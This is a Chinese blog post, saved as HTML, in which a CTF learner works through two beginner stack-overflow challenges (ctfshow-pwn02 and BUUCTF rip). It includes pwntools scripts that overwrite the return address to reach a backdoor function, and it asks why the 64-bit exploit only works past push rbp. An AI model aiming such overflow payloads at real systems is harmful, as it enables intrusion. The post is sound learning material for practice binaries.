

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="">
  <meta name="keywords" content="">
  
    <meta name="description" content="pwn的坑之堆栈平衡今天做了两道最基本的溢出题，就是劫持控制流到后门函数，思路和方法理论上是一样的，但是一道能打通一道打不通，至今百思不得其解，因此记录一下以待来日">
<meta property="og:type" content="article">
<meta property="og:title" content="Pwn-Question">
<meta property="og:url" content="http://0x4a-210.github.io/2025/07/19/Questions/Pwn-Question/index.html">
<meta property="og:site_name" content="0x4A">
<meta property="og:description" content="pwn的坑之堆栈平衡今天做了两道最基本的溢出题，就是劫持控制流到后门函数，思路和方法理论上是一样的，但是一道能打通一道打不通，至今百思不得其解，因此记录一下以待来日">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://0x4a-210.github.io/photos/Questions/Pwn-Q1/ctfshow-pwn02-main.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/Questions/Pwn-Q1/ctfshow-pwn02-pwnme.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/Questions/Pwn-Q1/ctfshow-pwn02-stack.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/Questions/Pwn-Q1/BUUCTF-file.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/Questions/Pwn-Q1/BUUCTF-rip-main.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/Questions/Pwn-Q1/BUUCTF-rip-fun.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/Questions/Pwn-Q1/BUUCTF-rip-checksec.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/Questions/Pwn-Q1/BUUCTF-rip-objdump.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/Questions/Pwn-Q1/BUUCTF-rip-fail.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/Questions/Pwn-Q1/debug1.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/Questions/Pwn-Q1/debug2.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/Questions/Pwn-Q1/debug3.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/Questions/Pwn-Q1/fail.png">
<meta property="article:published_time" content="2025-07-19T12:59:21.000Z">
<meta property="article:modified_time" content="2025-07-20T02:39:31.802Z">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://0x4a-210.github.io/photos/Questions/Pwn-Q1/ctfshow-pwn02-main.png">
  
  
  
  <title>Pwn-Question - 0x4A</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"0x4a-210.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>0x4A</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/Istaroth.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Pwn-Question"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-07-19 20:59" pubdate>
          July 19, 2025 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          975 words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          9 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Pwn-Question</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="pwn的坑之堆栈平衡"><a href="#pwn的坑之堆栈平衡" class="headerlink" title="pwn的坑之堆栈平衡"></a>pwn的坑之堆栈平衡</h1><p>今天做了两道最基本的溢出题，就是劫持控制流到后门函数，思路和方法理论上是一样的，但是一道能打通一道打不通，至今百思不得其解，因此记录一下以待来日<br></p>
<span id="more"></span>
<h1 id="题目说明"><a href="#题目说明" class="headerlink" title="题目说明"></a>题目说明</h1><h2 id="ctfshow-pwn02"><a href="#ctfshow-pwn02" class="headerlink" title="ctfshow-pwn02"></a>ctfshow-pwn02</h2><p>第一题，是ctfshow上的题目，给了一个32位程序stack，拖到IDA里看一下，main调用了pwnme函数，溢出点在pwnme，还有一个stack函数调用的system<br><br><img src="/../../photos/Questions/Pwn-Q1/ctfshow-pwn02-main.png" srcset="/img/loading.gif" lazyload><br><img src="/../../photos/Questions/Pwn-Q1/ctfshow-pwn02-pwnme.png" srcset="/img/loading.gif" lazyload><br><img src="/../../photos/Questions/Pwn-Q1/ctfshow-pwn02-stack.png" srcset="/img/loading.gif" lazyload><br>然后checksec看了下只开了NX，但无所谓了，又不执行shellcode，管它NX呢<br><br>接下来就是一些算偏移，找返回地址的操作<br><br>一系列操作以后得到偏移offset&#x3D;13，stack函数的地址&#x3D;0x804850f<br><br>然后写脚本，填充好垃圾数据，没开PIE的话把stack函数的地址写死就行，写出如下一个简单的脚本：<br></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(os=<span class="hljs-string">&quot;linux&quot;</span>,arch=<span class="hljs-string">&quot;x86&quot;</span>,log_level=<span class="hljs-string">&quot;debug&quot;</span>)<br><span class="hljs-comment">#ioTube=remote(&quot;pwn.challenge.ctf.show&quot;,28311,level=&quot;debug&quot;)</span><br>ioTube=process(<span class="hljs-string">&quot;/home/ubuntu/CTF/Pwn/ctfshow-pwn02/stack&quot;</span>)<br>ioTube.recvuntil(<span class="hljs-string">&quot;32bits\n&quot;</span>)<br>returnAddr=<span class="hljs-number">0x804850f</span><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">13</span>+p32(returnAddr)<br>ioTube.sendline(payload)<br>ioTube.recv()<br>ioTube.interactive()<br></code></pre></td></tr></table></figure>
<p>运行以后就可以直接拿到shell了</p>
<h2 id="BUUCTF-Pwn-rip"><a href="#BUUCTF-Pwn-rip" class="headerlink" title="BUUCTF-Pwn-rip"></a>BUUCTF-Pwn-rip</h2><p>然后来到第二题，也就作妖的这题，这是BUUCTF上的题目，Pwn下的第二题rip，给了一个pwn1的64位ELF文件（从下图的file输出可以看到）<br><br><img src="/../../photos/Questions/Pwn-Q1/BUUCTF-file.png" srcset="/img/loading.gif" lazyload><br>拖到IDA里可以看到溢出点发生在main函数的gets<br><br><img src="/../../photos/Questions/Pwn-Q1/BUUCTF-rip-main.png" srcset="/img/loading.gif" lazyload><br>然后有一个fun函数，直接调用了system<br><br><img src="/../../photos/Questions/Pwn-Q1/BUUCTF-rip-fun.png" srcset="/img/loading.gif" lazyload><br>按道理直接劫持到这个fun就可以<br><br>那就算一下偏移，看到main里面的缓冲区在rbp-0xf，+8，offset&#x3D;23<br><br>再checksec，看到没开PIE<br><br><img src="/../../photos/Questions/Pwn-Q1/BUUCTF-rip-checksec.png" srcset="/img/loading.gif" lazyload><br>那就可以直接在脚本里写死fun函数的地址，objdump看下fun函数在哪，如下图<br><br><img src="/../../photos/Questions/Pwn-Q1/BUUCTF-rip-objdump.png" srcset="/img/loading.gif" lazyload><br>于是按道理，学着第一题的思路，填充好offset，把返回地址写死成0x401186就肯定可以拿到shell，脚本也是这么写的<br></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment">#ioTube=remote(&quot;pwn.challenge.ctf.show&quot;,28311,level=&quot;debug&quot;)</span><br>context(os=<span class="hljs-string">&quot;linux&quot;</span>,arch=<span class="hljs-string">&quot;x86_64&quot;</span>,log_level=<span class="hljs-string">&quot;debug&quot;</span>)<br>ioTube=process(<span class="hljs-string">&quot;/home/ubuntu/CTF/Pwn/pwn1&quot;</span>)<br>ioTube.recvuntil(<span class="hljs-string">&quot;please input\n&quot;</span>)<br>offset=<span class="hljs-number">23</span><br>returnAddr=<span class="hljs-number">0x401186</span><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*offset+p64(returnAddr)<br>ioTube.sendline(payload)<br>ioTube.recv()<br>ioTube.interactive()<br></code></pre></td></tr></table></figure>
<p>但是，离谱的事情出现了，每次在interactive以后都会收到EOF<br><br><img src="/../../photos/Questions/Pwn-Q1/BUUCTF-rip-fail.png" srcset="/img/loading.gif" lazyload><br>然后，如果改成下面这样的利用脚本，就没有问题<br></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment">#ioTube=remote(&quot;pwn.challenge.ctf.show&quot;,28311,level=&quot;debug&quot;)</span><br>context(os=<span class="hljs-string">&quot;linux&quot;</span>,arch=<span class="hljs-string">&quot;x86_64&quot;</span>,log_level=<span class="hljs-string">&quot;debug&quot;</span>)<br>ioTube=process(<span class="hljs-string">&quot;/home/ubuntu/CTF/Pwn/pwn1&quot;</span>)<br>ioTube.recvuntil(<span class="hljs-string">&quot;please input\n&quot;</span>)<br>offset=<span class="hljs-number">23</span><br>returnAddr=<span class="hljs-number">0x401187</span><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*offset+p64(returnAddr)<br>ioTube.sendline(payload)<br>ioTube.recv()<br>ioTube.interactive()<br></code></pre></td></tr></table></figure>
<p>是的，仅仅是返回地址+1，后面又陆续尝试了别的返回地址，发现只要跳过fun函数的第一条指令，即push rbp，就可以<br><br>博主大感震撼并表示不理解，遂尝试gdb单步调试，看看到底怎么个事儿<br><br>从下面这张图可以明显看到rsp指向了我们要的0x401186，按道理ret指令结束后一定是去执行fun函数<br><br><img src="/../../photos/Questions/Pwn-Q1/debug1.png" srcset="/img/loading.gif" lazyload><br>并且接着si调试，可以看到，甚至它真的进到fun函数里面了<br><br><img src="/../../photos/Questions/Pwn-Q1/debug2.png" srcset="/img/loading.gif" lazyload><br>然后call system这里下个断点，可以正常执行完call指令前的所有指令<br><br><img src="/../../photos/Questions/Pwn-Q1/debug3.png" srcset="/img/loading.gif" lazyload><br>但是，最离谱的是，现在，在call system这里按下c键，让它继续执行，直接就崩溃<br><img src="/../../photos/Questions/Pwn-Q1/fail.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="疑问"><a href="#疑问" class="headerlink" title="疑问"></a>疑问</h2><p>这下博主彻底懵逼，这两个程序按道理完全一样的，只是改了下偏移和后门函数地址<br><br>唯二个人感觉可以算的上区别的：ctfshow的题目是32位，BUUCTF是64位；以及ctfshow的溢出点在pwnme函数，不在主函数，而BUUCTF的溢出点在主函数<br><br>在网上一番搜索无果，只找到一篇博客提到是堆栈平衡的缘故<br><br>可惜，截止目前依然不知道为什么BUUCTF这题一定要跳过push rbp的指令，只能先把问题记录下来…………</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E7%96%91%E9%97%AE%E5%92%8C%E8%B8%A9%E8%BF%87%E7%9A%84%E4%B8%80%E4%BA%9B%E5%9D%91/" class="category-chain-item">疑问和踩过的一些坑</a>
  
  
    <span>></span>
    
  <a href="/categories/%E7%96%91%E9%97%AE%E5%92%8C%E8%B8%A9%E8%BF%87%E7%9A%84%E4%B8%80%E4%BA%9B%E5%9D%91/Pwn/" class="category-chain-item">Pwn</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Pwn-Question</div>
      <div>http://0x4a-210.github.io/2025/07/19/Questions/Pwn-Question/</div>
    </div>
    <div class="license-meta">
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>July 19, 2025</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/07/20/pwn.college/Intro-to-Cybersecurity/Pwn/Control-Hijack/" title="Control-Hijack">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Control-Hijack</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/07/19/pwn.college/Intro-to-Cybersecurity/Pwn/NULL-Free-Shellcode/" title="NULL-Free-Shellcode">
                        <span class="hidden-mobile">NULL-Free-Shellcode</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
